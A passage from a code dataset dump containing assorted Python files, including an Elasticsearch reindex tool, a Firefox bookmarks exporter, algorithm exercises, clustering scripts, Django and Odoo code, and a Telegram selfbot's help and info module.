_source.get(date_field, None)\n if date_str:\n _source[date_field] = format_date(date_str)\n return _source\n\n\ndef change_doc(hits, index):\n for h in hits:\n h['_index'] = index\n if 'fields' in h:\n h.update(h.pop('fields'))\n\n yield h\n\n\ndef custom_reindex(client, source_index, target_index, query=None,\n target_client=None, chunk_size=500, scroll='5m',\n scan_kwargs={}, bulk_kwargs={}):\n \"\"\"\n Custom method since we want to change index field names.\n \"\"\"\n target_client = client if target_client is None else target_client\n docs = scan(\n client,\n query=query,\n index=source_index,\n scroll=scroll,\n fields=('_source', '_parent', '_routing', '_timestamp'),\n **scan_kwargs\n )\n kwargs = {'stats_only': True, }\n kwargs.update(bulk_kwargs)\n changed_doc = change_doc(docs, target_index)\n return bulk(target_client, changed_doc, chunk_size=chunk_size, **kwargs)\n\n\ndef load_file(location):\n with open(location) as f:\n mapping = f.read()\n return mapping\n\n\ndef add_mapping(settings_location, host, port, index_name):\n url = 'http://{host}:{port}/{index_name}'.format(\n host=host,\n port=port,\n index_name=index_name\n )\n r = requests.put(url, data=load_file(settings_location))\n if not r.status_code == 200:\n raise Exception('Can not add mapping', r.text)\n\n\n@click.command()\n@click.option('--source_host', default='localhost', help='Elastic source IP.')\n@click.option('--source_port', default=9200, help='Elastic source port.')\n@click.option('--dest_host', default='localhost', help='Elastic dest IP.')\n@click.option('--dest_port', default=9200, help='Elastic dest port.')\n@click.option('--source_indices', default='', help='Comma separated list, no spaces')\n@click.option('--dest_indices', default='', help='Comma separated list, no spaces')\n@click.option('--chunk_size', default='500', help='Chunk size')\n@click.option('--doc_type', default='', help='Document type to filter on')\n@click.option('--scroll', default='5m', help='Scroll duration')\ndef do_reindex(source_host, source_port, dest_host, dest_port, source_indices,\n dest_indices, chunk_size, scroll, doc_type):\n source_client = Elasticsearch(\n [{'port': source_port, 'host': source_host}],\n timeout=200\n )\n dest_client = Elasticsearch(\n [{'port': dest_port, 'host': dest_host}],\n timeout=200\n )\n source_indices = source_indices.split(',')\n dest_indices = dest_indices.split(',') if dest_indices else source_indices\n query = u'{ \"query\": { \"filtered\": { \"filter\": { \"term\": { \"_type\": \"%s\" } } } } }' % doc_type if doc_type else None\n for source_index_name, dest_index_name in zip(source_indices, dest_indices):\n reindex(\n source_client,\n source_index_name,\n dest_index_name,\n query,\n dest_client,\n chunk_size=chunk_size,\n scroll=scroll,\n bulk_kwargs={'raise_on_error': False}\n )\n\n\nif __name__ == '__main__':\n do_reindex()\n","sub_path":"reindex.py","file_name":"reindex.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"297792375","text":"import sqlite3\nimport unicodedata\n\ndef fromsql(fname):\n destination = open(\"bookmarks.csv\", 'a')\n conn = sqlite3.connect(fname)\n db = dict()\n cursor = conn.execute(\"SELECT moz_bookmarks.parent, moz_bookmarks.type, moz_bookmarks.title, moz_bookmarks.id, moz_bookmarks.dateAdded, moz_bookmarks.lastModified, moz_places.url FROM moz_bookmarks, moz_places WHERE moz_bookmarks.fk = moz_places.id AND moz_bookmarks.type = 1 AND moz_bookmarks.title != '(NULL)'\")\n getparent = conn.execute(\"SELECT id, title, parent, dateAdded, lastModified FROM moz_bookmarks WHERE type = 2\")\n for item in getparent:\n db[item[0]] = item[1]\n getparent = conn.execute(\"SELECT id, title, parent, dateAdded, lastModified FROM moz_bookmarks WHERE type = 2 AND parent!=4\")\n for item in getparent:\n parentid = item[2]\n #print(item[1])\n #print(parentid)\n parent = \"\"\n #print(parentid)\n try:\n parent = db[parentid]\n except KeyError:\n parent = \"\"\n #print(parent)\n destination.write(parent+\",\"+str(parentid)+\",\"+\"folder,\"+item[1]+\",\"+str(item[0])+\",\"+str(item[3])+\",\"+str(item[4])+\",NA\")\n destination.write(\"\\n\")\n line = \"\"\n for row in cursor:\n line = \"\"\n parentid = row[0]\n parent = db[parentid]\n #print(parent)\n if(parent!=\"\"):\n line = line + parent+\",\"+str(parentid)+\",\"+\"url,\"\n else:\n line = line + \" \"+\",\"+str(parentid)+\",url,\"\n #print(row)\n destination.write(line)\n for entry in row[2:6]:\n output = \"\"\n if isinstance(entry, str):\n entry = entry.replace(\",\",\" \")\n try:\n output = str(entry)\n destination.write(output+\",\")\n except UnicodeEncodeError:\n output = unicodedata.normalize('NFD', line).encode('ascii', 'ignore')\n output = output.decode('ascii')\n destination.write(output)\n destination.write(\",\")\n destination.write(row[6])\n destination.write(\"\\n\")\n \n destination.close()\n conn.close()\n\nfromsql(\"places.sqlite\")\n","sub_path":"Bookmarks.py","file_name":"Bookmarks.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"40151454","text":"# -*- coding: utf-8 -*-\n\"\"\"\n 用两个栈实现队列\n ~~~~~~~~~~~~~~~~\n 题目:用两个栈实现一个队列。\n 请实现它的两个函数append_tail和delete_head,\n 分别完成在队列尾部插入结点和在队列头部删除结点的功能。\n\"\"\"\n\n\nclass MyQueue:\n def __init__(self):\n self.stack1 = []\n self.stack2 = []\n\n def append_tail(self, x):\n self.stack1.append(x)\n\n def delete_head(self):\n if len(self.stack2) == 0:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n\n head = self.stack2.pop()\n return head\n\n\nif __name__ == '__main__':\n queue = MyQueue()\n queue.append_tail(1)\n queue.append_tail(2)\n queue.append_tail(3)\n a = queue.delete_head()\n b = queue.delete_head()\n queue.append_tail(4)\n c = queue.delete_head()\n d = queue.delete_head()\n print(a, b, c, d)\n","sub_path":"src/problems/p23_two_stack_build_queue.py","file_name":"p23_two_stack_build_queue.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"88973866","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\n\r\n#设定训练数据集类\r\nclass Data():\r\n def __init__(self,data_input,data_output):\r\n self.data_input = data_input\r\n self.data_output = data_output\r\n\r\n def is_positive(self,f):#输出f列表中所有大于0的数\r\n selected_points = []\r\n for i in range(0,row):\r\n if f[i]>0:#点被正确分类\r\n selected_points.append(f[i])#f1存储正确分类点\r\n return selected_points\r\n\r\n def train(self):\r\n flag1 = True\r\n\r\n # 设定w,b,学习率初值\r\n w = np.zeros(column)\r\n w1=[]\r\n b = 0\r\n learning = 1\r\n selected_points=[]#筛选后f1\r\n\r\n while flag1==True:#第二层循环,直到训练集中没有误分类点,退出\r\n model = [np.dot(w, data_input[0]) + b, np.dot(w, data_input[1]) + b, np.dot(w, data_input[2]) + b]\r\n f = [data_output[0] * model[0], data_output[1] * model[1], data_output[2] * model[2]]#矩阵A*B\r\n selected_points = self.is_positive(f)\r\n if len(selected_points) == row :#第二层循环推出条件,直到正确分类点数等于所有分类点数\r\n flag1 = False\r\n else:\r\n selected_points = []\r\n\r\n for i in range(0, row):#w,b参数更新,第一层循环,从x1到x3,找到一次遍历之后的w,b\r\n flag2 = True\r\n while flag2:\r\n m = data_input[i]\r\n f = np.dot(w, data_input[i]) + b\r\n if data_output[i]*f <= 0:\r\n w += learning * data_output[i] * data_input[i]\r\n b += learning * data_output[i]\r\n w=copy.deepcopy(w)#深度copy用于返回w\r\n\r\n\r\n w1.append(w)\r\n else:\r\n flag2 = False\r\n\r\n return w,b,w1\r\n\r\n\r\nif __name__ == '__main__':\r\n #定义输入输出\r\n\r\n data_input = np.array([[3,3],[4,3],[1,1]])#定义输入 创建[[多维数组]]注意 3*2\r\n data_output = [1,1,-1]#定义输出\r\n data = Data(data_input,data_output)\r\n row,column = np.shape(data.data_input)#遍历次数 #a.shape=[行,列]\r\n\r\n\r\n w,b,w1 = data.train()#算法\r\n\r\n#画图\r\n\r\n plt.figure(figsize=(10, 5))\r\n x_values = [3, 4, 1]\r\n y_values = [3, 3, 1]\r\n plt.scatter(x_values, y_values, s=100)#画训练点\r\n\r\n for w3 in w1:\r\n print(w3)\r\n w0=w3[0]\r\n w1=w3[1]\r\n\r\n if w1!= 0:\r\n x=np.linspace(0,6,10)\r\n y=(-b-w0*x)/w1\r\n\r\n plt.plot(x,y)#画直线\r\n\r\n plt.rcParams['font.sans-serif']=['SimHei']\r\n plt.rcParams['axes.unicode_minus']=False#实现中文输入\r\n plt.title('感知机学习算法的原始形式实现')\r\n\r\n plt.show()\r\n","sub_path":"pereptron.py","file_name":"pereptron.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"202193931","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nimport sklearn\nfrom skimage.io import imread\n\nimport data_processing\nimport cluster_analysis\nimport k_means\nimport dbscan\nimport gaussian\n \ndef plot_cartesian_coordinates(x, y, z):\n \"\"\"Plot Cartesian coordinates of seismic events\"\"\"\n \n plt.figure(figsize=(10, 10))\n ax = plt.axes(projection='3d')\n ax.set_title('Cartesian coordinates of Seismic Events', {'fontsize':14, 'fontweight':'bold'})\n ax.scatter3D(x, y, z, '.', s=10, c='green')\n plt.savefig('Seismic_events_cartesian_coordinates.png', bbox_inches='tight');\n\ndef plot_classes(plot_name, labels, longitude, latitude, alpha=0.5, edge='k'):\n \"\"\"Plot seismic events using Mollweide projection.\n Arguments are the cluster labels and the longitude and latitude\n vectors of the events\"\"\"\n \n img = imread(\"Mollweide_projection_SW.jpg\") \n plt.figure(figsize=(10,5),frameon=False) \n x = longitude/180*np.pi\n y = latitude/180*np.pi\n ax = plt.subplot(111, projection=\"mollweide\")\n t = ax.transData.transform(np.vstack((x,y)).T)\n clims = np.array([(-np.pi,0),(np.pi,0),(0,-np.pi/2),(0,np.pi/2)])\n lims = ax.transData.transform(clims)\n plt.close()\n fig = plt.figure(figsize=(10,5),frameon=False) \n plt.subplot(111)\n plt.imshow(img,zorder=0,extent=[lims[0,0],lims[1,0],lims[2,1],lims[3,1]],aspect=1) \n x = t[:,0]\n y= t[:,1]\n nots = np.zeros(len(labels)).astype(bool)\n diffs = np.unique(labels) \n ix = 0 \n for lab in diffs[diffs>=0]: \n mask = labels==lab\n nots = np.logical_or(nots,mask) \n plt.plot(x[mask], y[mask],'o', markersize=4, mew=1,zorder=1,alpha=alpha, markeredgecolor=edge)\n ix = ix+1 \n mask = np.logical_not(nots) \n if np.sum(mask)>0:\n plt.plot(x[mask], y[mask], '.', markersize=1, mew=1,markerfacecolor='w', markeredgecolor=edge)\n plt.axis('off')\n plt.title(plot_name)\n fig.savefig(plot_name)\n\ndef kmeans_performance(X, labels_true, longitude, latitude, max_cluster):\n kmeans_eval = k_means.kmeans_tuning(X, max_cluster, labels_true, 205)\n k_means.plot_cluster(max_cluster, kmeans_eval)\n\n index_name = ['Precision', 'Recall', 'F1-Score', 'Rand Index', 'Adjusted Rand Index', 'Silhouette']\n for i in range(0, len(index_name)):\n best_k = kmeans_eval[:,i].argmax() + 2\n best_kmeans_model = sklearn.cluster.KMeans(best_k, random_state=205)\n best_kmeans_model.fit(X)\n labels_pred = best_kmeans_model.labels_\n best_kmeans_eval = cluster_analysis.evaluate_cluster(X, labels_true, labels_pred)\n print('\\nMaximising ' + index_name[i])\n print('Number of clusters: %d' % best_k)\n print(\"Precision: %0.3f\" % best_kmeans_eval[0])\n print(\"Recall: %0.3f\" % best_kmeans_eval[1])\n print(\"F1: %0.3f\" % best_kmeans_eval[2])\n print(\"Rand Index: %0.3f\" % best_kmeans_eval[3])\n print(\"Adjusted Rand Index: %0.3f\" % best_kmeans_eval[4])\n print(\"Silhouette: %0.3f\" % best_kmeans_eval[5])\n\ndef dbscan_performance(X, labels_true, longitude, latitude, epsilon, delta, pace= 1):\n #Calculate k_distances\n k_dist = dbscan.k_distance(X)\n dbscan.plot_k_distance(k_dist)\n #We set epsilon to the distance we have at point 500\n min_eps = max(10, epsilon-delta)\n max_eps = min(k_dist.max(), epsilon+delta)\n indices, n_clusters = dbscan.dbscan_tuning(X, labels_true, min_eps, max_eps, pace)\n dbscan.plot_indices(indices, min_eps, max_eps, pace)\n dbscan.plot_cluster(n_clusters, min_eps, max_eps, pace)\n eps_paper = k_dist[500]\n dbscan_model = sklearn.cluster.DBSCAN(eps_paper, 4, n_jobs=-1)\n dbscan_model.fit(X)\n pred_labels = dbscan_model.labels_\n \n dbscan_eval_paper = cluster_analysis.evaluate_cluster(X, labels_true, pred_labels)\n n_clusters_ = len(set(pred_labels)) - (1 if -1 in pred_labels else 0)\n print('Number of clusters: %d' % n_clusters_)\n print(\"Precision: %0.3f\" % dbscan_eval_paper[0])\n print(\"Recall: %0.3f\" % dbscan_eval_paper[1])\n print(\"F1: %0.3f\" % dbscan_eval_paper[2])\n print(\"Rand Index: %0.3f\" % dbscan_eval_paper[3])\n print(\"Adjusted Rand Index: %0.3f\" % dbscan_eval_paper[4])\n print(\"Silhouette: %0.3f\" % dbscan_eval_paper[5])\n plot_classes(\"DBSCAN\", pred_labels, longitude, latitude, alpha=0.5, edge='k')\n\ndef gmm_performance(X, labels_true, longitude, latitude, max_range):\n gmm_indices, gmm = gaussian.gmm_tuning(X, labels_true, max_range)\n gaussian.gmm_plot(gmm_indices, max_range)\n gmm.fit(X)\n labels_pred= gmm.predict(X)\n gmm_evaluate= cluster_analysis.evaluate_cluster(X, labels_true, labels_pred)\n n_clusters = gmm.n_components\n print('Number of components: %d' % n_clusters)\n print(\"Precision: %0.3f\" % gmm_evaluate[0])\n print(\"Recall: %0.3f\" % gmm_evaluate[1])\n print(\"F1: %0.3f\" % gmm_evaluate[2])\n print(\"Rand Index: %0.3f\" % gmm_evaluate[3])\n print(\"Adjusted Rand Index: %0.3f\" % gmm_evaluate[4])\n print(\"Silhouette: %0.3f\" % gmm_evaluate[5])\n plot_classes(\"GMM\", labels_pred, longitude, latitude, alpha=0.5, edge='k')\n\ndef main():\n # Get the data\n latitude, longitude, fault = data_processing.read_csv();\n x, y, z = data_processing.transform_coordinates(latitude, longitude);\n plot_cartesian_coordinates(x, y, z);\n X= data_processing.preprocess_data(x, y, z)\n \n plot_classes(\"Faults\", fault, longitude, latitude)\n \n # KMEANS\n max_cluster= 150\n kmeans_performance(X, fault, longitude, latitude, max_cluster)\n \n # DBSCAN\n epsilon = 300\n delta = 300\n dbscan_performance(X, fault, longitude, latitude, epsilon, delta)\n \n # GMM\n max_range = 200\n gmm_performance(X, fault, longitude, latitude, max_range)\n \nmain()","sub_path":"Test/tp2.py","file_name":"tp2.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"161517153","text":"from django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.status import HTTP_201_CREATED, HTTP_400_BAD_REQUEST, HTTP_404_NOT_FOUND, \\\n HTTP_405_METHOD_NOT_ALLOWED\n\nfrom backend.models import Address, Tag\nfrom backend.serializers import AddressSerializer, TagSerializer\n\n\n@csrf_exempt\ndef address_list(request):\n \"\"\"\n List all addresses or create a new one.\n :param request:\n :return: list of addresses\n \"\"\"\n response = HttpResponse(status=HTTP_405_METHOD_NOT_ALLOWED)\n if request.method == \"GET\":\n response = __list_addresses()\n elif request.method == \"POST\":\n response = __create_address(request)\n return response\n\n\n@csrf_exempt\ndef address_tags(request, pk):\n \"\"\"\n Retrieve an address' tags\n :param request:\n :param pk:\n :return: details of tags\n \"\"\"\n try:\n address = Address.objects.get(pk=pk)\n except Address.DoesNotExist:\n return HttpResponse(status=HTTP_404_NOT_FOUND)\n\n response = HttpResponse(status=HTTP_405_METHOD_NOT_ALLOWED)\n if request.method == 'GET':\n response = __retrieve_tags_by_address(address)\n\n return response\n\n\ndef __list_addresses():\n addresses = Address.objects.all()\n serializer = AddressSerializer(addresses, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\ndef __create_address(request):\n data = JSONParser().parse(request)\n serializer = AddressSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=HTTP_201_CREATED)\n return JsonResponse(serializer.errors, status=HTTP_400_BAD_REQUEST)\n\n\ndef __retrieve_tags_by_address(address):\n tags = Tag.objects.filter(address=address)\n serializer = TagSerializer(tags, many=True)\n return JsonResponse(serializer.data, safe=False)\n","sub_path":"backend/controllers/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"576775595","text":"# -*- coding: utf-8 -*-\n# © 2004-2011 Pexego Sistemas Informáticos. (http://pexego.es)\n# © 2012 NaN·Tic (http://www.nan-tic.com)\n# © 2013 Acysos (http://www.acysos.com)\n# © 2013 Joaquín Pedrosa Gutierrez (http://gutierrezweb.es)\n# © 2014-2015 Serv. Tecnol. Avanzados - Pedro M. Baeza\n# (http://www.serviciosbaeza.com)\n# © 2016 Antiun Ingenieria S.L. - Antonio Espinosa\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom odoo import fields, models, api\n\n\nclass ResPartner(models.Model):\n _inherit = \"res.partner\"\n\n not_in_mod347 = fields.Boolean(\n \"Not included in 347 report\",\n help=\"If you mark this field, this partner will not be included in \"\n \"any AEAT 347 model report, independently from the total \"\n \"amount of its operations.\", default=False)\n\n @api.model\n def _commercial_fields(self):\n res = super(ResPartner, self)._commercial_fields()\n res += ['not_in_mod347']\n return res\n","sub_path":"ascendia_mod347/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"610033003","text":"from google.cloud import vision\n\n\ndef localize_objects_uri(uri):\n client = vision.ImageAnnotatorClient()\n image = vision.types.Image()\n image.source.image_uri = uri\n objects = client.object_localization(\n image=image).localized_object_annotations\n return objects\n","sub_path":"vision/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"2765005","text":"def questionOne():\r\n inputF = open(\"four.txt\", 'r')\r\n outputF = open(\"solution4.txt\", 'w')\r\n\r\n for line in inputF:\r\n outputString = \"\"\r\n for i in line:\r\n if i.isupper():\r\n outputString = outputString + i\r\n else:\r\n pass\r\n outputF.write(outputString)\r\n\r\n inputF.close()\r\n outputF.close()\r\n\r\n\r\ndef questionTwo():\r\n inputF = open(\"four.txt\", 'r')\r\n\r\n numbers = '0123456789'\r\n\r\n finalNum3 = 0\r\n\r\n for fileLines in inputF:\r\n for text in fileLines:\r\n if text in numbers:\r\n # print(i)\r\n finalNum3 = finalNum3 + int(text)\r\n outputString = \"\"\r\n\r\n with open(\"four.txt\") as fp:\r\n for i, line in enumerate(fp):\r\n if i >= 10:\r\n\r\n for aLine in line:\r\n outputString = outputString + aLine.replace(\"|\", \" \")\r\n break\r\n\r\n counter = 0\r\n\r\n if \"|\" not in outputString:\r\n for i in outputString:\r\n counter = counter + 1\r\n if counter >= finalNum3:\r\n print(\"test\")\r\n print(i)\r\n break\r\n\r\n inputF.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n questionOne()\r\n questionTwo()","sub_path":"four.py","file_name":"four.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288565039","text":"import platform\nimport uuid\nfrom collections import defaultdict\nfrom typing import Any, ClassVar, Dict, List, MutableMapping, Optional\n\nimport pyrogram\nfrom pyrogram.errors import BotInlineDisabled, MessageDeleteForbidden\nfrom pyrogram.types import (\n CallbackQuery,\n InlineQuery,\n InlineKeyboardButton,\n InlineKeyboardMarkup,\n InlineQueryResultArticle,\n InputTextMessageContent\n)\n\nfrom .. import __version__, command, listener, module, util\n\n\nclass CoreModule(module.Module):\n name: ClassVar[str] = \"Core\"\n\n cache: Dict[int, int]\n db: util.db.AsyncCollection\n\n async def on_load(self):\n self.cache = {}\n self.db = self.bot.db.get_collection(\"core\")\n\n def build_button(self) -> List[List[InlineKeyboardButton]]:\n modules = list(self.bot.modules.keys())\n button: List[InlineKeyboardButton] = []\n for mod in modules:\n button.append(InlineKeyboardButton(\n mod, callback_data=f\"menu({mod})\".encode()))\n buttons = [\n button[i * 3:(i + 1) * 3]\n for i in range((len(button) + 3 - 1) // 3)\n ]\n buttons.append(\n [\n InlineKeyboardButton(\n \"✗ Close\",\n callback_data=\"menu(Close)\".encode()\n )\n ]\n )\n\n return buttons\n\n async def on_inline_query(self, query: InlineQuery) -> None:\n repo = self.bot.getConfig[\"github_repo\"]\n answer = [\n InlineQueryResultArticle(\n id=str(uuid.uuid4()),\n title=\"About Caligo\",\n input_message_content=InputTextMessageContent(\n \"__Caligo is SelfBot based on Pyrogram library.__\"),\n url=f\"https://github.com/{repo}\",\n description=\"A Selfbot Telegram.\",\n thumb_url=None,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n \"⚡️ Repo\",\n url=f\"https://github.com/{repo}\"),\n InlineKeyboardButton(\n \"📖️ How To\",\n url=f\"https://github.com/{repo}#Installation\"),\n ]\n ]\n )\n )\n ]\n if query.from_user and (query.from_user.id == self.bot.uid):\n button = await util.run_sync(self.build_button)\n answer.append(\n InlineQueryResultArticle(\n id=str(uuid.uuid4()),\n title=\"Menu\",\n input_message_content=InputTextMessageContent(\n \"**Caligo Menu Helper**\"),\n url=f\"https://github.com/{repo}\",\n description=\"Menu Helper.\",\n thumb_url=None,\n reply_markup=InlineKeyboardMarkup(button)\n )\n )\n\n await query.answer(results=answer, cache_time=3)\n return\n\n @listener.pattern(r\"menu\\((\\w+)\\)$\")\n async def on_callback_query(self, query: CallbackQuery) -> None:\n if query.from_user and query.from_user.id != self.bot.uid:\n await query.answer(\"Sorry, you don't have permission to access.\",\n show_alert=True)\n return\n\n mod = query.matches[0].group(1)\n if mod == \"Back\":\n button = await util.run_sync(self.build_button)\n await query.edit_message_text(\n \"**Caligo Menu Helper**\",\n reply_markup=InlineKeyboardMarkup(button))\n return\n if mod == \"Close\":\n button = await util.run_sync(self.build_button)\n for msg_id, chat_id in list(self.cache.items()):\n try:\n await self.bot.client.delete_messages(chat_id, msg_id)\n except Exception: # skipcq: PYL-W0703\n break\n else:\n break\n finally:\n del self.cache[msg_id]\n else:\n await query.answer(\"😿️ Couldn't close message\")\n await query.edit_message_text(\n \"**Caligo Menu Helper**\",\n reply_markup=InlineKeyboardMarkup(button[:-1]))\n\n return\n\n modules: MutableMapping[str, MutableMapping[str, str]] = defaultdict(dict)\n for _, cmd in self.bot.commands.items():\n if cmd.module.name != mod:\n continue\n\n desc = cmd.desc if cmd.desc else \"__No description provided__\"\n aliases = \"\"\n if cmd.aliases:\n aliases = f' (aliases: {\", \".join(cmd.aliases)})'\n\n mod_name = type(cmd.module).name\n modules[mod_name][cmd.name] = desc + aliases\n\n response = None\n for mod_name, commands in sorted(modules.items()):\n response = util.text.join_map(commands, heading=mod_name)\n\n if response is not None:\n button = [[InlineKeyboardButton(\n \"⇠ Back\", callback_data=\"menu(Back)\".encode()\n )]]\n await query.edit_message_text(\n response, reply_markup=InlineKeyboardMarkup(button))\n\n return\n\n await query.answer(f\"😿️ {mod} doesn't have any commands.\")\n return\n\n @command.desc(\"List the commands\")\n @command.usage(\"[filter: command or module name?]\", optional=True)\n async def cmd_help(self, ctx: command.Context) -> Optional[str]:\n if self.bot.has_bot and not ctx.input:\n response: Any\n try:\n response = await self.bot.client.get_inline_bot_results(\n self.bot.bot_user.username)\n except BotInlineDisabled:\n return \"__Bot Inline Disabled__\"\n else:\n await ctx.msg.delete()\n \n res: Any = await self.bot.client.send_inline_bot_result(\n ctx.msg.chat.id, response.query_id, response.results[1].id)\n self.cache[res.updates[0].id] = ctx.msg.chat.id\n\n return\n\n filt = ctx.input\n modules: MutableMapping[str, MutableMapping[str, str]] = defaultdict(dict)\n if filt and filt not in self.bot.modules:\n if filt in self.bot.commands:\n cmd = self.bot.commands[filt]\n\n aliases = f\"`{'`, `'.join(cmd.aliases)}`\" if cmd.aliases else \"none\"\n\n if cmd.usage is None:\n args_desc = \"none\"\n else:\n args_desc = cmd.usage\n\n if cmd.usage_optional:\n args_desc += \" (optional)\"\n if cmd.usage_reply:\n args_desc += \" (also accepts replies)\"\n\n return f\"\"\"`{cmd.name}`: **{cmd.desc if cmd.desc else '__No description provided.__'}**\n\nModule: {cmd.module.name}\nAliases: {aliases}\nExpected parameters: {args_desc}\"\"\"\n\n return \"__That filter didn't match any commands or modules.__\"\n\n for name, cmd in self.bot.commands.items():\n if filt:\n if cmd.module.name != filt:\n continue\n else:\n if name != cmd.name:\n continue\n\n desc = cmd.desc if cmd.desc else \"__No description provided__\"\n aliases = \"\"\n if cmd.aliases:\n aliases = f' (aliases: {\", \".join(cmd.aliases)})'\n\n mod_name = type(cmd.module).name\n modules[mod_name][cmd.name] = desc + aliases\n\n response = None\n for mod_name, commands in sorted(modules.items()):\n section = util.text.join_map(commands, heading=mod_name)\n add_len = len(section) + 2\n if response and (len(response) + add_len > util.tg.MESSAGE_CHAR_LIMIT):\n await ctx.respond_multi(response)\n response = None\n\n if response:\n response += \"\\n\\n\" + section\n else:\n response = section\n\n if response:\n await ctx.respond_multi(response)\n\n @command.desc(\"Get or change this bot prefix\")\n @command.alias(\"setprefix\", \"getprefix\")\n @command.usage(\"[new prefix?]\", optional=True)\n async def cmd_prefix(self, ctx: command.Context) -> str:\n new_prefix = ctx.input\n\n if not new_prefix:\n return f\"The prefix is `{self.bot.prefix}`\"\n\n self.bot.prefix = new_prefix\n await self.db.find_one_and_update(\n {\"_id\": self.name},\n {\n \"$set\": {\"prefix\": new_prefix}\n }\n )\n\n return f\"Prefix set to `{self.bot.prefix}`\"\n\n @command.desc(\"Get information about this bot instance\")\n @command.alias(\"botinfo\")\n async def cmd_info(self, ctx: command.Context) -> None:\n # Get tagged version and optionally the Git commit\n commit = await util.run_sync(util.version.get_commit)\n dirty = \", dirty\" if await util.run_sync(util.git.is_dirty) else \"\"\n unofficial = (\n \", unofficial\" if not await util.run_sync(util.git.is_official) else \"\"\n )\n version = (\n f\"{__version__} ({commit}{dirty}{unofficial})\"\n if commit\n else __version__\n )\n\n # Clean system version\n sys_ver = platform.release()\n try:\n sys_ver = sys_ver[: sys_ver.index(\"-\")]\n except ValueError:\n pass\n\n # Get current uptime\n now = util.time.usec()\n uptime = util.time.format_duration_us(now - self.bot.start_time_us)\n\n # Get total uptime from stats module (if loaded)\n stats_module = self.bot.modules.get(\"Stats\", None)\n get_start_time = getattr(stats_module, \"get_start_time\", None)\n total_uptime = None\n if stats_module is not None and callable(get_start_time):\n stats_start_time = await get_start_time()\n total_uptime = util.time.format_duration_us(now - stats_start_time) + \"\\n\"\n else:\n uptime += \"\\n\"\n\n # Get total number of chats, including PMs\n num_chats = await self.bot.client.get_dialogs_count()\n\n response = util.text.join_map(\n {\n \"Version\": version,\n \"Python\": f\"{platform.python_implementation()} {platform.python_version()}\",\n \"Pyrogram\": f\"{pyrogram.__version__}\",\n \"System\": f\"{platform.system()} {sys_ver}\",\n \"Uptime\": uptime,\n **({\"Total uptime\": total_uptime} if total_uptime else {}),\n \"Commands loaded\": len(self.bot.commands),\n \"Modules loaded\": len(self.bot.modules),\n \"Listeners loaded\": sum(\n len(evt) for evt in self.bot.listeners.values()\n ),\n \"Events activated\": f\"{self.bot.events_activated}\\n\",\n \"Chats\": num_chats,\n },\n heading='Caligo info',\n parse_mode=\"html\",\n )\n\n # HTML allows us to send a bolded link (nested entities)\n await ctx.respond(response, parse_mode=\"html\")\n","sub_path":"caligo/modules/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":11337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"289796488","text":"'''\nGiven a string which consists of lowercase or uppercase letters, find the length of the longest palindromes that can be built with those letters.\n\nThis is case sensitive, for example \"Aa\" is not considered a palindrome here.\n\nNote:\nAssume the length of given string will not exceed 1,010.\n\nExample:\n\nInput:\n\"abccccdd\"\n\nOutput:\n7\n\nExplanation:\nOne longest palindrome that can be built is \"dccaccd\", whose length is 7.\n'''\nclass Solution(object):\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if s is None:\n return 0\n mapping = {}\n for i in range(len(s)):\n if s[i] not in mapping:\n mapping[s[i]] = 1\n else:\n mapping[s[i]] += 1\n max_odd = 0\n cnt = 0\n indicator = False\n for key in mapping:\n if mapping[key] %2 == 0:\n cnt += mapping[key]\n else:\n indicator = True\n cnt += mapping[key] - 1\n if indicator == True:\n cnt += 1\n return cnt\n","sub_path":"palindrome/longest_palindrome.py","file_name":"longest_palindrome.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"351215735","text":"import os\nimport json\nimport pandas as pd\n\nprint('load TL_SCCO_CTPRVN.json...')\nf = open(os.path.join('GeoJSON', 'TL_SCCO_CTPRVN.json'), 'rt')\nCTRPVN = json.load(f)\nf.close()\n\nprint('load TL_SCCO_SIG.json...')\nf = open(os.path.join('GeoJSON', 'TL_SCCO_SIG.json'), 'rt')\nSIG = json.load(f)\nf.close()\n\nprint('load TL_SCCO_EMD.json...')\nf = open(os.path.join('GeoJSON', 'TL_SCCO_EMD.json'), 'rt')\nEMD = json.load(f)\nf.close()\n\ndatas = {\n 'CTPRVN_CD': [],\n 'CTPRVN_ENG_NM': [],\n 'CTPRVN_KOR_NM': [],\n 